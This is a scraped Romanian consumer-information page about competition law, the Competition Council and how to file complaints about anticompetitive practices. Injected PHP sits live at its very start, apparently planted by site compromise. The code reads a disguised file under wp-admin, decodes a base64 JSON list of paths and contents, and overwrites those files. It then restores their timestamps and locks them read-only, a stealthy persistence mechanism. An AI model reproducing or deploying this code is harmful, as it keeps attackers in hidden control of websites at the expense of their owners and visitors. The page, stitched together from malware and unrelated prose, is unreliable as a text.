$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } IMPORTANŢA LIBEREI CONCURENŢE PENTRU CONSUMATORI – O noua atitudine

Rolul Consiliului Concurenţei în protecţia, menţinerea şi promovarea concurenţei

De ce este importantă concurenţa

• Reprezintă motorul progresului economic.

• Asigură scăderea preţurilor şi creşterea calităţii, ceea ce are ca rezultat final protecţia consumatorilor.

• Trebuie să fie rezultatul performanţelor proprii ale agenţilor economici.

• Reprezintă baza bunei funcţionări a pieţelor deoarece asigură performanţa întreprinderilor, încurajează inovaţia şi reduce costurile de producţie.

• Reprezintă soluţia naturală pentru o alocare optimă a resurselor şi un mijloc economic natural de atingere a progresului economic.

• Există numai în măsura în care agenţii economici sunt liberi să ia decizii cu privire la comportamentul lor pe piaţă.
• Opreşte agenţii economici să ridice preţurile sau să scadă calitatea, deoarece oferă consumatorilor posibilitatea ca în astfel de cazuri să se orienteze spre un alt produs similar.

De ce sunt necesare reglementările legale cu privire la concurenţă

• Sunt necesare pentru ca libera concurenţă să nu rămână un ideal.

• Sunt adoptate în scopul protecţiei şi al promovării liberei concurenţe, ceea ce presupune o anumită egalitate a agenţilor economici.

• Apără concurenţa prin stabilirea cadrului în care se poate manifesta lupta agenţilor economici şi  sancţionează încălcarea normelor legale în domeniu.

• Apără în mod indirect consumatorul care este beneficiarul final al diversificării serviciilor şi produselor, la un preţ mai scăzut şi o calitate mai ridicată.

Care este rolul Consiliului Concurenţei

Consiliul Concurenţei este autoritatea publică autonomă care are ca scop protecţia, menţinerea şi promovarea liberei concurenţe şi a unui mediu concurenţial normal, în vederea promovării intereselor consumatorilor.

Important!
• Autoritatea de concurenţă nu are competenţe în ceea ce priveşte fixarea preţurilor de către agenţii economici. Acestea se formează liber pe piaţă, la întâlnirea dintre cerere şi ofertă.

• Autoritatea de concurenţă acţionează pentru protejarea concurenţei şi nu a anumitor agenţi economici sau interese economice.

• Consiliul Concurenţei nu are competenţe directe în ceea ce priveşte protejarea intereselor consumatorilor, dar întreaga activitate a acestuia se realizează în beneficiul final al cetăţenilor, deoarece, pe o piaţă nedistorsionată de practice anticoncurenţiale, ca efect al liberei concurenţe, creşte calitatea produselor şi a serviciilor, la un preţ mai redus.

Consiliul Concurenţei pune în aplicare Legea concurenţei nr. 21/1996, republicată, care are ca obiect:

• interzicerea înţelegerilor anticoncurenţiale

• interzicerea abuzului de poziţie dominantă

• controlul concentrărilor economice

Ce sunt înţelegerile anticoncurenţiale?

Înţelegerile anticoncurenţiale sunt acele acorduri între agenţi economici care au ca obiect sau ca efect denaturarea concurenţei pe piaţa românească sau pe o parte a acesteia.

Aceste înţelegeri sunt interzise de Legea concurenţei şi sancţionate de Consiliul Concurenţei.

Anumite înţelegeri, care sunt deosebit de periculoase pentru mediul de afaceri, sunt expres interzise de norma legală, de exemplu:

• fixarea concertată, în mod direct sau indirect, a preţurilor sau a adaosurilor;

• limitarea sau controlul producţiei, distribuţiei, dezvoltării tehnologice ori investiţiilor;

• împărţirea pieţelor de desfacere sau a surselor de aprovizionare;

• aplicarea, în privinţa partenerilor comerciali a unor condiţii inegale la prestaţii echivalente, provocând astfel, unora dintre ei, un dezavantaj în poziţia concurenţială;

• participarea, în mod concertat, cu oferte trucate la licitaţii sau la orice alte forme de concures de oferte.

Ce este abuzul de poziţie dominantă?

Agenţii economici concurează pentru a-şi consolida sau îmbunătăţi poziţia pe piaţă.

Deţinerea unei poziţii dominante nu este în sine ilegală, deoarece reprezintă rezultatul eficienţei economice proprii. Dar, dacă o întreprindere profită de poziţia sa dominantă pentru a restrânge sau împiedica concurenţa, această practică este considerată abuzivă şi sancţionată de Consiliul Concurenţei.

Un agent economic se găseşte în poziţie dominantă dacă are capacitatea de a se comporta pe piaţă independent de reacţia concurenţilor sau a cumpărătorilor.

În această situaţie, întreprinderea în cauză poate abuza de această situaţie, în special prin:
• impunerea, în mod direct sau indirect, a preţurilor de vânzare sau de cumpărare, a tarifelor ori a altor clauze contractuale inechitabile şi refuzul de a trata cu anumiţi furnizori sau beneficiari;

• limitarea producţiei, distribuţiei sau dezvoltării tehnologice în dezavantajul utilizatorilor ori consumatorilor;

• aplicarea, în privinţa partenerilor comerciali, a unor condiţii inegale la prestaţii echivalente, provocând în acest fel, unora dintre ei, un dezavantaj în poziţia concurenţială;

• practicarea unor preţuri excesive sau practicarea unor preţuri de ruinare, în scopul înlăturării concurenţilor.

CUM TE POŢI APĂRA ÎN CALITATE DE CONSUMATOR?

• Luând întotdeauna o decizie informată când achiziţionezi un produs, inclusiv prin studierea ofertei de produse similare de pe piaţă.

• Sesizând Consiliul Concurenţei când eşti victima unei practici anticoncurenţiale

CUM PUTEŢI FACE O PLÂNGERE?

Completând formularul prevăzut în Anexa Regulamentului pentru aplicarea art. 5 şi 6 din Legea nr. 21/1996, privind practicile anticoncurenţiale în cazul plângerilor.

Formularul se găseşte şi pe pagina de internet a Consiliului Concurenţei: www.consiliulconcurentei/informatii utile/modele de formulare.

Important!
Asociaţiile pentru protecţia consumatorilor te pot sprijini în completarea formularului de plângere sau pot formula plângeri în nume propriu, în baza sesizărilor primite de la consumatori.
Pe forum-ul găzduit de site-ul www: consiliulconcurentei.ro ne puteţi transmite opiniile dumneavoastră cu privire la investigaţiile desfăşurate de Consiliul Concurenţei şi la problemele de concurenţă cu care vă confruntaţi în calitate de consumatori

By o9admin